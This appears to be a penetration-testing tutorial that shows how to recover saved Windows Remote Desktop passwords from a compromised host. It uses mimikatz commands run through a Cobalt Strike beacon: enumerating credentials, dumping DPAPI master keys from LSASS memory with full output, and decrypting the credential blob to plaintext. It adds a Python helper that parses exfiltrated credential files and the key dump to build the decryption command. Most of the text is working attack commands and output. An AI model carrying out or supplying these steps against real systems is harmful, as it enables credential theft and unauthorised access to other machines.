True unfreedom is building a prison inside your own heart.

Obtaining Saved Windows Remote Desktop (RDP) Connection Passwords in Internal Network Penetration

Precondition: the target user (here the local Administrator) connected with mstsc and ticked the option to save the credentials. mstsc then stores the username and password through Credential Manager, which protects the blob with that user's DPAPI master key.

# First check whether any credentials have been saved at all with cmdkey /list.
# A credential saved by mstsc shows up with a Target of TERMSRV/<host>.
>cmdkey /list


  2. Locate the credential files. The Credentials directory and its files are hidden, so /a is required; check the Roaming profile path (%userprofile%\AppData\Roaming\Microsoft\Credentials\) as well, since roaming credentials are written there.
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*


  3. Read the blob header with mimikatz. Without a key, dpapi::cred only parses the DPAPI header, but that is enough to learn which master key protects the blob.
beacon> mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85


The header yields guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}; this is the master key that has to be recovered next.

  4. Dump the cached master keys with sekurlsa::dpapi. This reads LSASS memory, so it needs SYSTEM or SeDebugPrivilege, and it only returns master keys of users who currently have a logon session.
beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 788081 bytes
[+] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-20


Authentication Id : 0 ; 283117 (00000000:000451ed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-BVVD8VFVMPR
Logon Server      : WIN-BVVD8VFVMPR
Logon Time        : 2022/6/20 12:24:48
SID               : S-1-5-21-2815261350-2957312007-627930173-500
	 [00000000]
	 * GUID      :	{877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
	 * Time      :	2022/6/25 13:14:36
	 * MasterKey :	7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
	 * sha1(key) :	d90d81651dc81f37b34698ac101cf04c094c0cde


Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-19


Authentication Id : 0 ; 46503 (00000000:0000b5a7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : 


Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-18
	 [00000000]
	 * GUID      :	{62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
	 * sha1(key) :	6aff948e5a90e41f2edffd26da163af4f146b1a5
	 [00000001]
	 * GUID      :	{43ea2159-28dc-4507-90bd-751f19e7db5d}
	 * Time      :	2022/6/20 12:24:39
	 * MasterKey :	cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
	 * sha1(key) :	56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
	 [00000002]
	 * GUID      :	{0fefdf3f-162a-4a3f-a6df-6ec2dee82eb5}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	89012fd9de4903051a9b99225216df633efd8d1e014624f0a68670432da8fc1fda98babc447d5de1d3fe10069a6358be9a64fb1f634cf6012307465455757369
	 * sha1(key) :	3604ef0e99dab0ea49db307fd8950b8fd0d4d310
	 [00000003]
	 * GUID      :	{3d58f13e-ba7c-4457-835c-5a7f1353590c}
	 * Time      :	2022/6/25 13:12:50
	 * MasterKey :	c12ff664090f806ae980d32bfe19af5ba76f3d5f1dcad46e70da7affaede04c02ba00d5d75380fd4bd77f6cd535be3eec103f2f5048ceee96d61347e3d24d7ba
	 * sha1(key) :	be0643a97d988adcc8e5ae2b3d6df9702df32dc0

Match guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6} against the GUIDs in the dump. It appears under the Administrator interactive session (Authentication Id 283117), which is expected, because the blob was created in that user's context.

MasterKey: 7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

  5. Decrypt the credential by passing the master key back to dpapi::cred. The output includes the TERMSRV/<host> target, the UserName and the CredentialBlob, which is the plaintext RDP password.
mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85 /masterkey:7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

If the user is not logged on and the key is therefore not cached in LSASS, the master key file under %APPDATA%\Microsoft\Protect\<SID>\<guid> can instead be decrypted with dpapi::masterkey given the user's password (/sid and /password) or, in a domain, the domain DPAPI backup key; when the beacon already runs as that user, dpapi::cred /in:<file> /unprotect lets Windows do the decryption itself.
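The triage in steps 2 to 5 (read guidMasterKey out of the credential blob, match it against the sekurlsa::dpapi dump, build the final dpapi::cred command) can also be done offline once the file and the mimikatz output have been exfiltrated. The Python below is an added example, not code from the original post or from mimikatz. It parses the DPAPI blob header layout (the CryptProtectData format documented by public DPAPI research and implemented in impacket's dpapi.py) and the 12-byte wrapper of a Credentials file. Its input is a constructed credential file whose header uses the GUID from this page but whose ciphertext, salt and signature are dummy bytes, plus the sekurlsa::dpapi excerpt shown above; the description string and the helper names are assumptions. It does not perform the AES/HMAC decryption itself, which stays mimikatz's job.

```python
import re
import struct
import uuid
from typing import Dict, Optional, Tuple

# Every DPAPI blob carries this fixed provider GUID right after the version DWORD.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_ID values commonly seen in DPAPI blobs (display names only).
ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES", 0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}


def _u32(buf: bytes, off: int) -> Tuple[int, int]:
    """Read a little-endian DWORD; return (value, new offset)."""
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _counted(buf: bytes, off: int) -> Tuple[bytes, int]:
    """Read a DWORD length followed by that many bytes."""
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the DPAPI blob header and return what an operator needs for triage,
    above all guidMasterKey (the same value step 3 gets from dpapi::cred)."""
    off = 0
    version, off = _u32(blob, off)
    provider = uuid.UUID(bytes_le=blob[off:off + 16]); off += 16
    _mk_version, off = _u32(blob, off)
    guid_master_key = uuid.UUID(bytes_le=blob[off:off + 16]); off += 16
    flags, off = _u32(blob, off)
    desc_raw, off = _counted(blob, off)          # UTF-16LE description
    crypt_alg, off = _u32(blob, off)
    _crypt_alg_len, off = _u32(blob, off)
    salt, off = _counted(blob, off)
    _hmac_key, off = _counted(blob, off)
    hash_alg, off = _u32(blob, off)
    _hash_alg_len, off = _u32(blob, off)
    _hmac, off = _counted(blob, off)
    data, off = _counted(blob, off)              # the ciphertext
    sign, off = _counted(blob, off)              # HMAC over the blob
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob")
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return {
        "guid_master_key": str(guid_master_key),
        "flags": flags,
        "description": desc_raw.decode("utf-16-le").rstrip("\x00"),
        "crypt_alg": ALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "hash_alg": ALG_NAMES.get(hash_alg, hex(hash_alg)),
        "salt_len": len(salt),
        "ciphertext_len": len(data),
        "sign_len": len(sign),
    }


def parse_credential_file(raw: bytes) -> dict:
    """A Credentials\\<hex> file is a 12-byte header (version, blob size, reserved)
    followed by the DPAPI blob."""
    _version, size, _reserved = struct.unpack_from("<III", raw, 0)
    blob = raw[12:12 + size]
    if len(blob) != size:
        raise ValueError("truncated credential file")
    return parse_dpapi_blob(blob)


def parse_sekurlsa_dpapi(output: str) -> Dict[str, str]:
    """Map every master-key GUID printed by sekurlsa::dpapi to its hex key."""
    keys, current = {}, None
    for line in output.splitlines():
        m = re.search(r"\*\s*GUID\s*:\s*\{([0-9a-f-]{36})\}", line, re.I)
        if m:
            current = m.group(1).lower()
            continue
        m = re.search(r"\*\s*MasterKey\s*:\s*([0-9a-f]+)", line, re.I)
        if m and current:
            keys[current] = m.group(1).lower()
            current = None
    return keys


def decrypt_command(cred_path: str, guid_master_key: str, keys: Dict[str, str]) -> Optional[str]:
    """Build the step-5 mimikatz line, or None when the blob's master key is not
    cached in LSASS (then go via the master key file and dpapi::masterkey)."""
    mk = keys.get(guid_master_key.lower())
    return None if mk is None else "dpapi::cred /in:%s /masterkey:%s" % (cred_path, mk)


def build_sample_credential_file(guid_master_key: str) -> bytes:
    """Constructed stand-in for a Credentials file: real layout, dummy ciphertext."""
    desc = "Local Credential Data\x00".encode("utf-16-le")      # assumed description
    blob = b"".join([
        struct.pack("<I", 1), DPAPI_PROVIDER_GUID.bytes_le,
        struct.pack("<I", 1), uuid.UUID(guid_master_key).bytes_le,
        struct.pack("<I", 0), struct.pack("<I", len(desc)), desc,
        struct.pack("<II", 0x6610, 256), struct.pack("<I", 32), b"\x11" * 32,   # AES-256, salt
        struct.pack("<I", 0),                                                   # empty HMAC key
        struct.pack("<II", 0x800E, 512), struct.pack("<I", 64), b"\x22" * 64,   # SHA-512, HMAC
        struct.pack("<I", 48), b"\x33" * 48,                                    # dummy ciphertext
        struct.pack("<I", 64), b"\x44" * 64,                                    # dummy signature
    ])
    return struct.pack("<III", 1, len(blob), 0) + blob


# Excerpt of the sekurlsa::dpapi output shown on this page (constructed copy).
SAMPLE_SEKURLSA_OUTPUT = """
Authentication Id : 0 ; 283117 (00000000:000451ed)
User Name         : Administrator
\t [00000000]
\t * GUID      :\t{877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
\t * Time      :\t2022/6/25 13:14:36
\t * MasterKey :\t7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
\t * sha1(key) :\td90d81651dc81f37b34698ac101cf04c094c0cde
Authentication Id : 0 ; 999 (00000000:000003e7)
\t [00000000]
\t * GUID      :\t{62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
\t * Time      :\t2022/6/25 12:58:55
\t * MasterKey :\t54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
"""

CRED_PATH = r"C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85"

if __name__ == "__main__":
    info = parse_credential_file(build_sample_credential_file("877c4ae6-d114-4851-b9ab-c8d23c7f09a6"))
    print(info)
    print(decrypt_command(CRED_PATH, info["guid_master_key"], parse_sekurlsa_dpapi(SAMPLE_SEKURLSA_OUTPUT)))
```

Run it against a real file by replacing the constructed sample with `open(path, "rb").read()` and pasting the full sekurlsa::dpapi output; a `None` from `decrypt_command` tells you up front that the owning user has no cached key and the master key file route is needed.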

The Cobalt Strike TaoWu plugin also has a module that automates the same steps and retrieves the password of a saved Remote Desktop connection.
